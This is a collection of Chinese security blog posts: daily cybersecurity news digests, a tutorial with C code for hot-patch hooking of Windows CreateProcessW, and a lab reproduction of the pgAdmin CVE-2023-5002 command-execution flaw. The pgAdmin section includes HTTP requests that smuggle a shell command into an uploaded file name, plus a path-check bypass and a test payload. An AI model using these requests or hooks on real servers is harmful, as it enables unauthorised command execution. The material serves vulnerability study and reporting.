网络安全日报 2024年06月26日
1、BlackSuit勒索团伙攻击CDK Global造成服务中断 https://www.bleepingcomputer.com/news/security/cdk-global-outage-caused-by-blacksuit-ransomware-attack/ 研究人员发现BlackSuit勒索软件团伙是造成CDK Global公司大规模IT服务中断以及北美各地汽车经销店中断的幕后黑手。不愿透露姓名的消息人士声称CDK目前正在与勒索软件团伙谈判,以获得解密器并避免被盗数据泄露。由于CDK Global服务平台目前已关闭,汽车经销商不得不改用纸笔来开展业务。CDK警告相关客户,威胁行为体正在致电冒充CDK代理或附属公司经销商的名义发起攻击,以获取 2、WordPress插件被植入后门创建恶意管理账户 https://www.wordfence.com/blog/2024/06/supply-chain-attack-on-wordpress-org-plugins-leads-to-5-maliciously-compromised-wordpress-plugins/ 研究人员发现多款WordPress插件被植入后门恶意代码,攻击者试图创建一个新的管理用户帐户,然后可以执行任意操作,包括将系统的详细信息发送回攻击者控制的服务器。此外威胁行为体似乎还在网站页脚中注入了恶意JavaScript代码,似乎会在整个网站中实现垃圾邮件SEO攻击功能。攻击者创建的管理员帐户的用户名为“Option 3、Chrome 126 更新修复了高危内存安全漏洞 https://www.securityweek.com/chrome-126-update-patches-memory-safety-bugs/ 谷歌周一宣布了新的 Chrome 安全更新,该更新解决了外部研究人员报告的四个高严重性内存安全漏洞。是影响该流行浏览器的 Dawn 和 Swiftshader 组件的释放后使用漏洞。 4、印度尼西亚国家数据中心遭勒索攻击被索要 800万美元赎金 https://www.securityweek.com/indonesia-says-a-cyberattack-has-compromised-its-data-center-but-it-wont-pay-the-8-million-ransom/ 印度尼西亚当局周一表示,印度尼西亚国家数据中心遭到黑客组织攻击,该组织索要 800 万美元赎金,但政府不会支付。 5、Zyxel NAS 漏洞近期被僵尸网络利用 https://www.securityweek.com/recent-zyxel-nas-vulnerability-exploited-by-botnet/ Shadowserver Foundation 警告称,已停产的 Zyxel NAS 设备中最近披露的严重漏洞已被用于僵尸网络攻击。 6、新的攻击技术利用 Microsoft 管理控制台文件 https://thehackernews.com/2024/06/new-attack-technique-exploits-microsoft.html 威胁行为者正在利用一种新颖的攻击技术,该技术利用特制的管理保存控制台 (MSC) 文件来使用 Microsoft 管理控制台 ( MMC ) 获得完整的代码执行并逃避安全防御。 7、澳大利亚 Ticketek 发生云泄露,约 3000 万人受影响 https://www.darkreading.com/cloud-security/30m-affected-tickettek-australia-cloud-breach Darkreading 网站消息,与最近的 Ticketmaster 入侵事件直接相似的事件中,澳大利亚一家现场活动票务巨头 Ticketek 表示,它是通过第三方云提供商被入侵的,而 ShinyHunters 则是罪魁祸首。 8、Rafel RAT 恶意软件盯上了”过时“安卓手机 https://www.bleepingcomputer.com/news/security/ratel-rat-targets-outdated-android-phones-in-ransomware-attacks/ Rafel RAT 恶意软件的攻击目标主要是政府和军事部门,大多数受害者位于美国、中国和印度尼西亚。其中一些攻击活动是由 APT-C-35(DoNot Team)等知名勒索软件组织发起,伊朗和巴基斯坦疑似为恶意活动的源头。 9、OpenAI宣布停止不支持国家API服务 https://www.secrss.com/articles/67419 6月25日,全球知名的人工智能公司OpenAI宣布,为了维护服务质量和安全性,将采取额外措施来限制来自当前不支持的国家和地区的API流量。 10、Coinstats 称朝鲜黑客入侵了 1,590 个加密钱包 https://www.bleepingcomputer.com/news/cryptocurrency/coinstats-says-north-korean-hackers-breached-1-590-crypto-wallets/ CoinStats 是一款拥有 150 万用户的加密货币投资组合应用程序,它遭遇了重大安全漏洞,影响了 1,590 个加密货币钱包。朝鲜威胁行为者被怀疑是此次攻击的幕后黑手。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
浅谈热补丁的钩取方式
前言 热补丁的钩取方式是为了解决内联钩取在多线程情况下会出错的情况,使用热补丁的钩取可以避免重复读写指令造成问题。 内联钩取潜在问题 正常情况下,在每次跳转到自定义函数时需要将原始的指令(mov edi,edi)写回CreateProcessW函数内,为了后续正确调用CreateProcesW函数,在调用完毕之后,又需要进行挂钩的处理,即将mov指令修改为jmp指令。 但是在多线程的情况下就可能会出现下列问题,在进行mov指令篡改时可能会发生线程的切换,因为篡改指令的操作不是原子操作。那么在线程2时可能调用了CreateProcessW函数时可能跳转指令还没写完成,例如下图的jmp 0x12xx,而不是原本的jmp 0x1234就导致了执行出错。 为了解决此问题采用了热补丁钩取。 热补丁钩取 热补丁是指在不中断系统运行进行应用。即不中断程序运行也能够修改系统库或程序中的执行逻辑。 这里以CreateProcessW为例子 在windbg中使用以下指令在CreateProcessW函数中打下断点 .reload /f bp CreateProcessW 可以看到CreateProcessW函数入口点是mov edi,edi指令,而在该指令上方有一段没用用到的空间,在windbg中使用int 3指令填充了。 而mov edi,edi指令本身没有实际意义,这就是微软在系统库预留的空间,用于打上热补丁。因为这个指令无论被修改成什么都不会影响程序的执行。 接着可以发现这跳指令的长度为2字节,因此可以使用任意的2字节长的指令替换mov edi,edi。 那么这里就需要寻找可以完成跳转的指令,并且仅占用2字节完成对mov指令的替换。 在汇编中存在着短跳转指令可以完成跳转并且仅占用2字节,用以下例子来观察一下短跳转的指令。 int main() {    // 使用标签作为跳转目标    __asm {        jmp short label;   };    // 标签处定义跳转目标 label:    // 这里是跳转目标后的代码    return 0; } 可以看到在跳转到标签label上时,采用的跳转指令机器码是EB开头的,而不是E9,并且指令长度也只有2字节。 那么00是跳转的偏移值,根据该例子分析一下跳转偏移的计算 跳转偏移 = 目标地址 - 当前地址 - 当前指令的长度 00     = 00731005 - 00731003 - 2 可以看到计算偏移的公式与jmp指令一致,只是跳转的指令的长度为5字节,而短跳转的指令长度为2字节,因此jmp指令也被称之为长跳转。 那么怎么配合短跳转进行一个钩取操作,如下图。我们可以借助短跳转使得指令执行到上述填充的区域,然后再使用jmp指令完成钩取的操作。这里需要注意的是空闲区域的空间大小需要大于5个字节,不然无法容纳jmp指令。 最终修改后钩取的效果如下图,在自定义函数中不在需要钩取与脱钩的操作,因为我们修改的指令不会影响正常的CreateProcessW函数执行。那么在既然不存在写操作,那么在多线程中也不会因为条件竞争导致还没写完就切换线程的情况。 那么代码实现部分如下,这里需要注意长跳转的指令0xE9,短跳转的指令为0xEB,这里先把偏移计算好了0xF9,因此写好了,但是这个偏移值不是唯一值,只要找到的地址存在大于5字节的空闲区域都是可以的。紧接着就是修改函数内部的指令,将初始的指令修改为短跳转,然后再空闲区中填充长跳转即可。 ...    //长跳转指令    BYTE pBuf[5] = { 0xE9, 0 };    //短跳转指令 + 偏移值    BYTE pShortJmp[2] = { 0xEB, 0xF9};    //获取模块地址    HMODULE hModule = GetModuleHandleA(szDllName);    //获取函数地址    FARPROC pfnOld = GetProcAddress(hModule, szFuncName);    //选中长跳转指令填充的地址,这里选择恰好能容纳jmp指令的位置    DWORD target = (DWORD)pfnOld - 5;    //计算跳转的偏移    DWORD dwAddress = (DWORD)pfnNew - target - 5;    //修改区域的权限    VirtualProtect((LPVOID)target, 7, PAGE_EXECUTE_READWRITE, &dwOldProtect);    //将偏移填充到指令中    memcpy(&pBuf[1], &dwAddress, 4);    //将长跳转指令填充    memcpy((LPVOID)target, pBuf, 5);    //保存原始的两个字节    memcpy(pOldBytes, pfnOld, 2);    //将短跳转指令填充    memcpy(pfnOld, pShortJmp, 2);    VirtualProtect((LPVOID)target, 7, dwOldProtect, &dwOldProtect); ... 在自定义函数中,只需要直接调用CreatePorcessW + 2的指令就可以完成原始CreateProcessW函数,不再需要挂钩脱钩的处理。 ...    //调用CreateProcessW + 2 BOOL ret = ((LPFN_CreateProcessW)((DWORD)pfnOld + 2))(        applicationName,        lpCommandLine,        lpProcessAttributes,        lpThreadAttributes,        bInheritHandles,        dwCreationFlags,        lpEnvironment,        lpCurrentDirectory,        lpStartupInfo,        lpProcessInformation       ); ... 完整代码: https://github.com/h0pe-ay/HookTechnology/tree/main/Hook-HotPatch总结 优点:避免多线程出错 缺点:不一定有热补丁的条件,就是不一定存在有垃圾指令 如64位程序的CreateProcessW函数的第一条指令是mov r11,rsp,但是后续的指令都需要用到r11寄存器的值,因此该指令不是无用指令。就不能上述热补丁的方法。
网络安全日报 2024年06月25日
1、多个威胁组织利用开源RafelRAT攻击安卓设备 https://research.checkpoint.com/2024/rafel-rat-android-malware-from-espionage-to-ransomware-operations/ 研究人员发现包括DoNot(又名APT-C-35、Brainworm或Origami Elephant)APT组织在内的多个威胁行为体正在使用名为Rafel RAT的开源Android远程管理工具来进行网络攻击。Rafel RAT拥有广泛的功能,例如擦除SD卡、删除通话记录、窃取信息通知,甚至充当勒索软件等,DoNot组织利用Foxit PDF Reader的设计缺陷诱骗用户点击下载恶意 2、恶意广告活动伪装软件应用传播AdsExhaust木马 https://www.esentire.com/blog/adsexhaust-a-newly-discovered-adware-masquerading-oculus-installer 研究人员发现威胁行为体使用搜索引擎优化(SEO)投毒技术在Google搜索结果页面上显示虚假网站,诱导毫无戒心的网站访问者下载包含Windows批处理脚本的ZIP存档,最终安装一个名为AdsExhaust的恶意广告软件,该广告软件能够从受感染的设备中窃取截图,并使用模拟按键与浏览器进行交互,例如自动点击广告或将浏览器重定向到特定的URL,从而为广告软件运营商创造收入。 3、SolarWinds Serv-U高危漏洞正被威胁组织利用 https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ 研究人员发现最近修补的一个影响SolarWinds Serv-U文件传输软件的高严重性漏洞正被野外威胁行为体积极利用。该漏洞编号为CVE-2024-28995(CVSS评分:8.6),属于目录横向迁移漏洞,可能允许攻击者读取主机上的敏感文件。该漏洞影响Serv-U 15.4.2 HF1之前的所有软件版本,该公 4、开源电商平台模块漏洞被利用窃取信用卡信息 https://security.friendsofpresta.org/modules/2024/06/18/pkfacebook.html 研究人员发现威胁行为体正在利用开源电子商务平台PrestaShop的Facebook高级模块(pkfacebook)中的漏洞,在易受攻击的电子商务网站上部署信用卡盗刷器,并窃取永余的支付信用卡的详细信息。PrestaShop是一个开源的电子商务平台,允许个人和企业创建和管理在线商店。截至2024年,全球约有300000家在线商店使用该平台。该严重漏洞编号为CVE-2024-36680,是 pkfacebook模块的facebookConnect.ph 5、新的 SnailLoad 攻击依靠网络延迟变化来猜测用户活动 https://www.securityweek.com/new-snailload-attack-relies-on-network-latency-variations-to-infer-user-activity/ 名为 SnailLoad 的新攻击允许远程攻击者无需直接访问网络流量即可猜测用户浏览的网站和视频。 6、LockBit称入侵了美国联邦储备银行窃取了33TB敏感数据 https://securityaffairs.com/164873/cyber-crime/lockbit-claims-hacked-us-federal-reserve.html Lockbit 勒索软件组织宣布已入侵美国联邦储备银行并窃取了 33 TB 的敏感数据。 7、Ollama AI 工具中发现严重远程代码执行漏洞 https://thehackernews.com/2024/06/critical-rce-vulnerability-discovered.html 该漏洞被追踪为 CVE-2024-37032 并被称为 Probllama,已在 2024 年 5 月 7 日发布的 0.1.34 版本中得到修补。Ollama 是一种用于在 Windows、Linux 和 macOS 设备上本地运行大型语言模型的服务。 8、谷歌推出 Naptime 项目,用于人工智能漏洞研究 https://thehackernews.com/2024/06/google-introduces-project-naptime-for.html 谷歌开发了一个名为Project Naptime的新框架,据称该框架可使大型语言模型 (LLM) 开展漏洞研究,旨在改进自动发现方法。 9、疑似 Kimsuky (APT-Q-2) 以军工招聘为饵攻击欧洲 https://www.secrss.com/articles/67272 近期奇安信威胁情报中心发现一批以美国军工企业在德国地区的招聘为诱饵的攻击样本,同时其他安全研究人员也对相关样本进行了公开披露 。 10、朱利安·阿桑奇将与美国达成协议承认指控 https://www.securityweek.com/wikileaks-founder-julian-assange-will-plead-guilty-in-deal-with-us-and-return-to-australia/ 维基解密创始人朱利安·阿桑奇将与美国司法部达成协议,承认一项重罪指控,美国司法部在提交给法庭的一封信中表示,阿桑奇定于在美国西太平洋联邦区马里亚纳群岛的联邦法院出庭,承认根据《间谍法》提出的密谋非法获取和传播机密国防信息的指控。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月24日
1、Mailcow开源邮件套件存在远程代码执行漏洞 https://www.sonarsource.com/blog/remote-code-execution-in-mailcow-always-sanitize-error-messages/ 研究人员披露了开源邮件服务器套件Mailcow存在的两个安全漏洞,威胁行为体可以利用这些漏洞在易受攻击的实例上执行任意代码。这两个安全漏洞影响2024年4月4日发布的Mailcow开源邮件服务器套件2024-04版之前的所有软件版本,攻击者可以利用漏洞通过使用特制的输入触发异常将恶意脚本注入管理面板,从而劫持会话并在管理员面板中执行特权操作。 2、T-Mobile称泄露数据源自于其第三方供应商 https://www.bleepingcomputer.com/news/security/t-mobile-denies-it-was-hacked-links-leaked-data-to-vendor-breach/ 名为IntelBroker的攻击组织声称已窃取并正在出售德国电信公司T-Mobile的数据,并在黑客论坛上发布了几个截图显示攻击者能够以管理权限访问Confluence服务器和公司内部供开发人员使用的Slack频道,威胁行为体将他们出售的数据内容描述为“源代码、SQL 文件、图像、Terraform数据、t-mobile.com认证、Siloprograms”。T-Mo 3、网络犯罪组织利用免费软件诱饵传播窃密软件 https://www.trellix.com/blogs/research/how-attackers-repackaged-a-threat-into-something-that-looked-benign/ 研究人员发现威胁行为者使用免费或盗版的商业软件作为诱饵攻击毫无戒心的用户,例如攻击者设法诱骗用户下载受密码保护的存档文件,其中包含了被木马感染的Cisco Webex Meetings应用程序,Cisco Webex Meetings应用程序会秘密加载隐秘的名为Hijack Loader的恶意软件加载程序,然后部署名为Vidar Stealer的信息窃取程序,甚至利用额外的有效载 4、新型Fickle窃密木马可绕过系统UAC防护 https://www.fortinet.com/blog/threat-research/fickle-stealer-distributed-via-multiple-attack-chain 研究人员披露一种名为Fickle Stealer的基于Rust语言的新型信息窃取恶意软件正通过多种攻击链进行传播,已发现四种不同的传播方法包括VBA投放器、VBA下载器、链接下载器和可执行下载器,其中一些使用PowerShell脚本绕过用户帐户控制(UAC)来执行Fickle Stealer。PowerShell脚本(如名为“bypass.ps1”或“u.ps1”)还会定期向攻击者控制的Teleg 5、高风险CosmicSting漏洞影数百万商务网站 https://sansec.io/research/cosmicsting CosmicSting(又名CVE-2024-34102)是两年来Magento和Adobe Commerce商店遭遇的最严重的漏洞,数百万个网站在“CosmicSting”漏洞安全更新发布九天后仍未得到修补,这使它们面临XML外部实体注入(XXE)和远程代码执行(RCE)的风险。漏洞允许任何人读取私人文件(例如带有密码的文件),结合Linux中最近的iconv错误可以组合实现远程代码执行。 6、研究人员发现影响多款英特尔CPU的UEFI漏洞 https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware 研究人员披露了影响多个系列的英特尔酷睿台式机和移动处理器,这些现已修复的安全漏洞存在于Phoenix SecureCore UEFI 固件中。UEFIcanhazbufferoverflow漏洞的编号为CVE-2024-0762(CVSS 评分:7.5),它被描述为一种缓冲区溢出的类型,源于在受信任平台模块 (TPM)配置中使用不安全变量可能导致执行 7、RansomHub勒索软件针对VMware ESXi虚拟机 https://www.recordedfuture.com/ransomhub-draws-in-affiliates-with-multi-os-capability-and-high-commission-rates RansomHub勒索软件于2024年2月开始活跃,其代码与组织成员与ALPHV/BlackCat和Knight 勒索软件有关联。由于可以更好地管理CPU、内存和存储资源,大量企业采用虚拟机来托管其服务器,研究人员近期发现RansomHub威胁组织在其武器库中还有一个专门针对VMware ESXi虚拟机Linux环境的变体,在加密完成后还会禁用系统日志和其他关键服务以阻碍 8、美国以国家安全风险理由封杀卡巴斯基软件 https://www.bis.gov/press-release/commerce-department-prohibits-russian-kaspersky-software-us-customers 美国商务部工业安全局(BIS)周四宣布了一项“史无前例”的禁令,禁止卡巴斯基实验室美国子公司直接或间接在该国提供其安全软件商业活动,封锁还扩展到该网络安全公司的附属公司、子公司和母公司。根据禁令,从7月20日起,卡巴斯基将被禁止向美国消费者和企业销售其软件。不过,该公司仍可在9月29日之前向现有客户提供软件和防病毒签名更新。 9、未修补漏洞允许冒充微软企业电子邮件账户 https://securityaffairs.com/164675/hacking/expert-warns-of-a-spoofing-bug.html 研究人员Vsevolod Kokorin(@Slonser)发现漏洞允许攻击者冒充微软公司电子邮件帐户并发起网络钓鱼攻击,并已向微软报告了该漏洞,但微软公司回复称无法重现他的发现。随后该研究人员在X上公开了的这一漏洞,但并未透露该漏洞的技术细节,以防止恶意黑客利用它。目前该问题尚未得到解决,并且尚不清楚是否有威胁行为体已在野外攻击中利用该漏洞。 10、黑客组织窃取埃森哲企业3万员工数据 https://hackread.com/hacker-leaks-accenture-employees-data-breach/ 代号为“888”的黑客组织最近泄露了一份文件包含埃森哲32828名现任和前任员工个人联系方式与信息。埃森哲企业总部位于爱尔兰都柏林,是一家全球专业服务公司,专门从事IT服务和咨询,业务遍及120多个国家。2024年6月19日星期三,这些数据被发布在臭名昭著的黑客论坛Breach Forums上,此次泄露事件中没有涉及用户的密码凭证,黑客组织声称这些数据是在一次涉及埃森哲第三方合作公司的入侵中获得的。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
pgAdmin后台命令执行漏洞(CVE-2023-5002)
我们可以看到针对于漏洞 CVE-2022-4223,官方做了一定的修复措施。 web\pgadmin\misc__init__.py#validate_binary_path 首先是添加了 @login_required 进行权限校验。在 Flask 框架中,@login_required 装饰器通常与 Flask-Login 扩展一起使用。Flask-Login 提供了简单而强大的用户身份验证功能,其中包括 @login_required 装饰器用于保护需要登录用户才能访问的视图。当在一个函数、方法或类上应用 @login_required 装饰器时,它会检查当前用户是否已经登录。如果用户未登录,则会将其重定向到登录页面或返回相应的错误信息,而不允许访问被装饰的代码块。 添加了权限校验之后,这个漏洞就从未授权的前台漏洞,转换为需要登录的后台漏洞了。 同时对传入的路径进行校验,通过 os.path.exists 来判断是否存在。 linux 我们发现会对传入的路径进行校验的,那么在linux 下,我们可以通过在服务器上上传一个包含恶意文件名的文件,来进行绕过。 可以从 docker hub 上搜索 docker 资源 https://hub.docker.com/search?q=pgadmindocker pull dpage/pgadmin4:7.6 docker run -e 'PGADMIN_DEFAULT_EMAIL=test@example.com' -e 'PGADMIN_DEFAULT_PASSWORD=123456'  -p 5050:80 --name pgadmin -d  docker.io/dpage/pgadmin4:7.6 登录后台工具->存储管理器 上传一个包含恶意文件名的文件 POST /file_manager/filemanager/3395111/ HTTP/1.1 Host: 127.0.0.1:5050 Content-Length: 491 X-pgA-CSRFToken: ImE3NDYzOGJhOWYxNDIzY2QzZDUwNTI3MWMzOGU4NGNhMmNhNzkzYTQi.Zi8ctA._DuZsbw2SE05kwuVkqgG7Y-KsjE Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryihDQGI2B09k9alLf Origin: http://127.0.0.1:5050 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:5050/browser/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: pga4_session=2397843f-fbe6-4481-947e-e30f73c6a0ee!GPxXiZuTJzjVn+sk6vhlLNAmjhQr6xIY0yumFSIGBAQ=; PGADMIN_LANGUAGE=zh Connection: close ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="newfile"; filename="\";id;#" Content-Type: text/plain 123 ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="mode" add ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="currentpath" / ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="storage_folder" my_storage ------WebKitFormBoundaryihDQGI2B09k9alLf-- 同时可以得到在文件在服务器上的路径 打开文件->配置 路径->二进制路径->填入恶意文件的位置 点击运行 windows 下载软件并进行安装 https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v6.21/windows/pgadmin4-6.21-x64.exe需要把C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web 下的config.py 修改 DEFAULT_SERVER \= '0.0.0.0' 因为windows 无法利用拼接来执行命令,所以还是要想办法成功加载文件才行。 import os binary_path = "\\\\192.168.222.128\\TMP\\" UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql'] for utility in UTILITIES_ARRAY:    full_path = os.path.abspath(        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))   )    print(full_path)    print(os.path.exists(full_path)) windows 不能再利用共享资源来实现,所以也构造一个exe 上传并执行。 编译恶意的exe文件并放到上传 pip install pyinstaller type execute_calc.py import subprocess def execute_calc():    subprocess.call("calc.exe") if __name__ == "__main__":    execute_calc() pyinstaller --onefile execute_calc.py 和linux启动有所不同 Tools->import 成功将恶意文件上传到服务器上。 同时构造请求数据包 POST /misc/validate_binary_path HTTP/1.1 Host: 192.168.222.145:5050 X-pgA-CSRFToken: IjU4MzQ0OTM2Yzc3YzM5ZmE5Yjg0MjRhODVlNzkzZjM5MTViZDBmNzki.Zi9GcQ.pGwCjLqPq3fNzohIRNerpipIRK8 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Origin: http://192.168.222.145:5050 Referer: http://192.168.222.145:5050/browser/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: pga4_session=e6f521fc-e9f4-4c58-bf0a-e9abafb4ceb5!JG7fBzRT4FkugKb175t9vWdZpKmAtnbo0d/oPzcAbFI=; PGADMIN_LANGUAGE=en Connection: close Content-Type: application/json Content-Length: 39 {"utility_path":"C:\\Users\\whippet\\"} 可能是因为本地测试的原因,后来尝试的时候发现,本地去调用共享文件时,可以接收到请求,但是很快就断开连接,所以最后的结果是 False。 所以环境为windwos 时可以利用共享资源来绕过 os.path.exists()的检测。
网络安全日报 2024年06月21日
1、CDK Global遭网络攻击影响数千家美国汽车经销商 https://www.bleepingcomputer.com/news/security/cdk-global-cyberattack-impacts-thousands-of-us-car-dealerships/ 汽车经销商软件服务提供商CDK Global遭受大规模网络攻击,导致公司关闭系统,客户无法正常开展业务。CDK Global为汽车行业的客户提供SaaS平台,处理汽车经销商运营的各个方面,包括CRM、融资、工资单、支持和服务、库存以及后台运营。遭受网络攻击后CDK Global关闭了其IT系统、电话和应用程序以防止攻击蔓延,包括在昨晚凌晨2点左右关闭了其两个数据中心。 2、攻击者创建虚假软件报错信息传播恶意窃密软件 http://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn 研究人员发现名为TA571的威胁行为体通过引诱用户访问一个被感染的网站,网站中通过币安的智能链合约加载托管在区块链上的恶意脚本,脚本会执行一些检查,并显示虚假的Google Chrome网页错误警告弹框,对话框提示访问者通过将PowerShell脚本复制到剪贴板并在Windows PowerShell(管理)控制台中运行来修复错误,实际会下载Matanbuchus或DarkGate家族的窃密软件。 3、Void Arachne组织利用虚假VPN软件安装器针对中文用户 https://www.trendmicro.com/en_us/research/24/f/behind-the-great-wall-void-arachne-targets-chinese-speaking-user.html 研究人员发现代号为Void Arachne的前所未见的威胁行为体正在使用搜索引擎优化投毒、社交媒体消息平台等手段传播恶意软件,包括伪装成虚拟专用网络(LetsVPN、QuickVP)、Google Chrome、简体中文版Telegram语言包、AI语音转换器、深度色情伪造器等流行软件的恶意Windows安装程序,最终植入Winos 4.0远控框架,Winos 4、美国以国家安全风险为由禁止销售卡巴斯基产品 https://securityaffairs.com/164753/laws-and-regulations/us-bans-sale-of-kaspersky-products.html 拜登政府宣布将禁止销售卡巴斯基杀毒软件,原因是俄罗斯对美国国家安全构成风险。美国政府正在利用特朗普政府时期建立的权力实施一项新规定,以俄罗斯对美国国家安全构成风险为由禁止销售卡巴斯基软件。 5、ATLASSIAN 修复了CONFLUENCE 中的六个高危漏洞 https://securityaffairs.com/164743/security/atlassian-confluence-crucible-jira-flaws.html 澳大利亚软件公司 Atlassian 解决了其 Confluence、Crucible 和 Jira 解决方案中的多个高严重漏洞。 6、新型信息窃取程序 FICKLE STEALER 通过多种攻击方式进行传播 https://securityaffairs.com/164726/malware/fickle-stealer-attack-methods.html Fortinet FortiGuard 实验室的研究人员检测到一种基于 Rust 的新型信息窃取程序,名为 Fickle Stealer,它通过多种攻击媒介传播。该恶意软件代码复杂,依赖多种策略进行传播,包括 VBA 投放器、VBA 下载器、链接下载器和可执行文件下载器。 7、研究人员发现影响多款英特尔 CPU 的 UEFI 漏洞 https://www.securityweek.com/hundreds-of-pc-server-models-possibly-affected-by-serious-phoenix-uefi-vulnerability/ Phoenix 的 SecureCore UEFI 固件解决方案中最近发现一个高严重漏洞,数百种使用英特尔处理器的 PC 和服务器型号可能会受到该漏洞的影响。该漏洞的编号为 CVE-2024-0762,又名UEFIcanhazbufferoverflow,本地攻击者可以利用此安全漏洞在运行时提升权限并在 UEFI 固件中执行任意代码。 Phoenix Technol 8、命令行程序 wget 中发现一个严重漏洞 https://borncity.com/win/2024/06/18/critical-vulnerability-cve-2024-38428-in-wget/ 命令行程序 wget 中发现一个严重漏洞,CVSS 基本评分为 10.0。该漏洞存在于 9、AMD多项内部数据被黑客挂到暗网出售 https://www.bleepingcomputer.com/news/security/amd-investigates-breach-after-data-for-sale-on-hacking-forum/ AMD正在调查一起数据泄露事件,该事件可能有网络攻击导致,攻击者已将窃取的数据泄露至黑客论坛出售,声称其中包含AMD员工信息、财务文件和其他机密信息。 10、苹果公司遭黑客入侵,部分工具源代码被盗 https://www.freebuf.com/news/403976.html 6 月份,Intel Broker 非法“访问”苹果公司的网络系统,盗取了 AppleConnect-SSO、AppleMacroPlugin、Apple-HWE-Confluence-Advanced 等工具的源代码。苹果方面指出,此次网络攻击事件不会对苹果公司的客户信息造成任何影响。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月20日
1、保险巨头Globe Life门户网站遭入侵用户数据被访问 https://www.sec.gov/Archives/edgar/data/320335/000032033524000029/gl-20240614.htm 美国金融服务控股公司Globe Life表示,攻击者可能在入侵其一个门户网站后访问了系统中的消费者和保单持有人的数据。该事件是公司在6月13日星期四审查与访问权限、用户身份管理相关的潜在漏洞时发现的。应州保险监管机构的询问,Globe Life的副法律顾问兼公司秘书Christopher T. Moore在周五向美国证券交易委员会(SEC)提交的文件中表示:“在通知这些情况后,公司立即移除了对该门户的非法外部访问。” 2、新型黑客工具包针对微软365账户发起钓鱼 https://blog.eclecticiq.com/onnx-store-targeting-financial-institution 一个名为ONNX Store的新型网络钓鱼即服务(PhaaS)平台可以针对Microsoft 365和Office 365电子邮件帐户发起攻击,该平台是阿拉伯语威胁行为体MRxC0DER管理的Caffeine网络钓鱼工具包的更名版本。研究人员已经发现有攻击者正在使用ONNX平台的服务,通过网络钓鱼电子邮件分发带有恶意二维码的PDF附件,盗取包括银行、信用合作社服务提供商和私人融资公司等行业员工的Microsoft 365帐户的登陆凭证。 3、Scattered Spider黑客组织针对SaaS应用程序窃密数据 https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications/ 研究人员发现Scattered Spider黑客组织试图从软件即服务(SaaS)应用程序中窃取数据,并从Active Directory联合服务(ADFS)中提取证书,结合Golden SAML攻击攻击者可以获得对基于云的应用程序的持久访问权限。Scattered Spider黑客团伙也被称为Octo Tempest、0ktapus、Scatter Swine和UNC3944,通常通过短信钓鱼、SIM交换和账户 4、CISA警告Windows严重漏洞被勒索软件组织利用 https://www.cisa.gov/known-exploited-vulnerabilities-catalog 美国网络安全和基础设施安全局(CISA)将一个在勒索软件攻击中被滥用的高严重性Windows漏洞标记为零日漏洞,并添加到由CISA维护的软件安全漏洞目录中。该漏洞被跟踪为CVE-2024-26169,由Windows系统错误报告服务中的不正确权限管理缺陷引起。成功利用该漏洞可使本地攻击者在无需用户交互的低复杂性攻击中获得系统高级别权限。微软已于2024年3月12日的每月补丁更新中修补了该漏洞。 5、AMD公司被盗数据出现在黑客论坛中出售 https://www.bleepingcomputer.com/news/security/amd-investigates-breach-after-data-for-sale-on-hacking-forum/ 2024年6月,AMD公司遭遇网络攻击后数据泄露,泄露数据包括:未来的AMD产品计划、规格表、员工数据库、客户数据库、属性文件、ROM、源代码、固件和财务状况等。一名威胁行为体将被盗的数据放在黑客论坛上出售,威胁行为体分享了一些据称被盗的AMD凭证截图,但尚未透露这些凭证的售价和获取方式。AMD正在与执法官员以及第三方托管合作伙伴密切合作调查该攻击事件。 6、Google Chrome 126 更新解决了多个高严重性漏洞 https://securityaffairs.com/164688/security/google-chrome-126-update.html Google 发布了 Chrome 126 更新,该更新解决了 TyphoonPWN 2024 黑客大赛上展示的高严重性漏洞。 7、Mailcow 邮件服务器漏洞导致服务器遭受远程代码执行 https://thehackernews.com/2024/06/mailcow-mail-server-flaws-expose.html Mailcow 开源邮件服务器套件中披露了两个安全漏洞,恶意行为者可以利用这些漏洞在易受攻击的实例上执行任意代码。 